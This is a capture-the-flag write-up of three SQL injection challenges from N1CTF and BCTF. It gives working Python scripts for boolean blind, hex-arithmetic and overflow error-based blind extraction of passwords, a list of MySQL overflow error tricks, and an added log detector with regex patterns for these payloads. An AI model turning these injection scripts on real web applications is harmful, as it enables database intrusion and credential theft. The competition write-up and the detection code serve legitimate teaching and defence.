N1CTF + BCTF (three SQL injection challenges)

Preface

Three SQL injection challenges; each one taught me a new trick.

Main text

77777

Challenge and analysis


After a partial review of the source, the task is a boolean-based blind injection through the hi parameter: if the score gets updated, the injected condition evaluated to true.

Solution script

# hi = where ord(mid((select group_concat(user())), 1, 1)) > 0 &flag=55553
import requests

url = 'http://47.97.168.223:23333/'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"}
# Candidate characters tried for each position of the password.
x = '1234567890qwertyuiopasdfghjkl;zxcvbnm,._/QWERTYUIOPASDFGHJKLZXCVBNM'
ans = ''
flag = 153333  # score sent with each request; incremented per request so each response is distinguishable
for pos in range(10, 15):
    for j in range(len(x)):
        flag = flag + 1
        # Condition is true only when character `pos` of the password equals x[j]
        data = {'hi': ' where mid((select group_concat(password)) ,' + str(pos) + ', 1) like ' + hex(ord(x[j])), 'flag': flag}
        resp = requests.post(url, data=data, headers=headers).text
        if str(flag) in resp:
            # The new score was stored, so the condition held.
            ans = ans + x[j]
            break
        elif str(flag - 1) not in resp:
            # Neither the new nor the previous score came back: the request was not processed.
            pass
    print(pos)
    print(ans)
# venenof7
# he3l3locat233

77777(2)

Analysis

mid is filtered, and so are several digits. Using conv together with hex, each character can be turned into its hexadecimal value, which is then multiplied by flag; the score echoed back is that character's value as a number, and reversing the conversion recovers the character.

Script

import re
import requests

_target = 'http://47.52.137.90:20000/'

def extract_points(html):
    # The score is rendered as "My Points | <number>" followed by a newline
    return re.search(r'My Points \| ([0-9]+)\n', html).group(1).strip()

def get_pw_len():
    # Multiplying flag=1 by length(pw) echoes the password length as the score
    d = {'flag': '1', 'hi': '*length( pw )'}
    resp = requests.post(_target, data=d)
    return int(extract_points(resp.text))

flag = ''
for i in range(1, get_pw_len() + 1):
    # Position is written as a binary literal (0b...) because the digits are filtered;
    # hex() of one character gives its hex digits, convert(..., signed) makes them a number
    d = {'flag': '1', 'hi': '*convert(hex(substr( pw ,0b{0:b},1)),signed)'.format(i)}
    resp = requests.post(_target, data=d)
    # The echoed number is the hex code of the character, so parse it in base 16
    flag += chr(int(extract_points(resp.text), 16))
    print(flag)
print('[+] flag: N1CTF{{{}}}'.format(flag))

Love Q

After fuzzing, it turned out that everything that could be filtered was filtered: the only digits left are 2 and 9, while select and if are still usable. What is different this time is that the score is no longer shown, so the only feedback is the "sorry" error message, which means error-based blind injection. One nasty detail: that "sorry" is rendered in a tiny font, I did not see it at all during the competition and assumed errors were not reported :P

Three MySQL overflow error techniques

1. Integer overflow error: *, +
2. Type conversion that turns an unsigned value negative and raises an error: ^
3. Floating-point error (the double range is -1.79E+308 ~ +1.79E+308): ^ (inversion)

Solution script analysis

import string
import sys
import requests

flag = 0
url = "http://9ec20782e7c14e2bac67c9bde95b39e39c887ccc4d314867.game.ichunqiu.com/"
data = {'flag': flag}
proxies = {
    'http': None,
    'https': None
}
ans = ""
while True:
    for i in string.ascii_letters:
        # While pw is still greater than the guessed prefix the if() returns 2;
        # otherwise 999999999*9e299 overflows a double and the page answers "sorry".
        data['hi'] = "|if((select pw)>'%s',2,999999999*9e299)" % (ans + i)
        result = requests.post(url, data=data, proxies=proxies)
        if i == 'Z':
            # Went through every letter without an error: nothing left to recover.
            sys.exit()
        if 'sorry' in result.text:
            # The first letter that makes the comparison false is one past the real one.
            ans += chr(ord(i) - 1)
            print(ans)
            sys.stdout.flush()
            break


Note that the last character comes out one too low (g instead of h), because > is false once the guessed prefix equals the whole password; just restore that g to h.
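From the defending side, the three payload shapes used above (boolean substring probes, hex/convert arithmetic, and overflow-triggering arithmetic inside if()) are easy to spot in request logs. The following detector is an added example, not code from the original writeup; the "<ip> POST / <urlencoded body>" log format, the watched parameter names and the sample lines are all constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Indicators drawn from the three challenges above (constructed list; tune to your app).
PATTERNS = {
    "boolean_substring": re.compile(r"\b(mid|substr|substring)\s*\(.*\b(like|=|>|<)", re.I),
    "hex_arithmetic": re.compile(r"\b(convert|conv|hex)\s*\(|0b[01]+", re.I),
    "overflow_error": re.compile(r"[*+^-]\s*\d[\d.]*e\d+|\d{19,}", re.I),
    "control_flow": re.compile(r"\bif\s*\(\s*\(?\s*select\b", re.I),
}
SUSPECT_PARAMS = ("hi", "flag")  # assumed names of the parameters that reach the SQL query

def classify_body(body):
    """Return the set of indicator names matching any watched parameter in a POST body."""
    hits = set()
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name not in SUSPECT_PARAMS:
            continue
        for v in values:
            for label, rx in PATTERNS.items():
                if rx.search(v):
                    hits.add(label)
    return hits

def scan_log(lines):
    """Yield (client_ip, sorted indicator names) for each log line whose body matches."""
    for line in lines:
        ip, _, body = line.partition(" POST / ")
        hits = classify_body(body)
        if hits:
            yield ip, sorted(hits)

# Constructed sample log in the assumed "<ip> POST / <urlencoded body>" format
SAMPLE_LOG = [
    "10.0.0.5 POST / hi=hello&flag=3",
    "10.0.0.9 POST / hi=%20where%20mid((select%20group_concat(password))%2C10%2C1)%20like%200x61&flag=153334",
    "10.0.0.9 POST / hi=*convert(hex(substr(%20pw%20%2C0b1%2C1))%2Csigned)&flag=1",
    "10.0.0.9 POST / hi=%7Cif((select%20pw)%3E%27a%27%2C2%2C999999999*9e299)&flag=0",
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, hits)
```

A single match is a strong signal on its own; a burst of matching requests from one client with an incrementing flag value is the blind-injection loop itself.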

Related links

http://hackermio.me/2018/04/21/BCTF-Web-Writeup/
http://f1sh.site/2018/04/22/bctf-love-q-writeup/
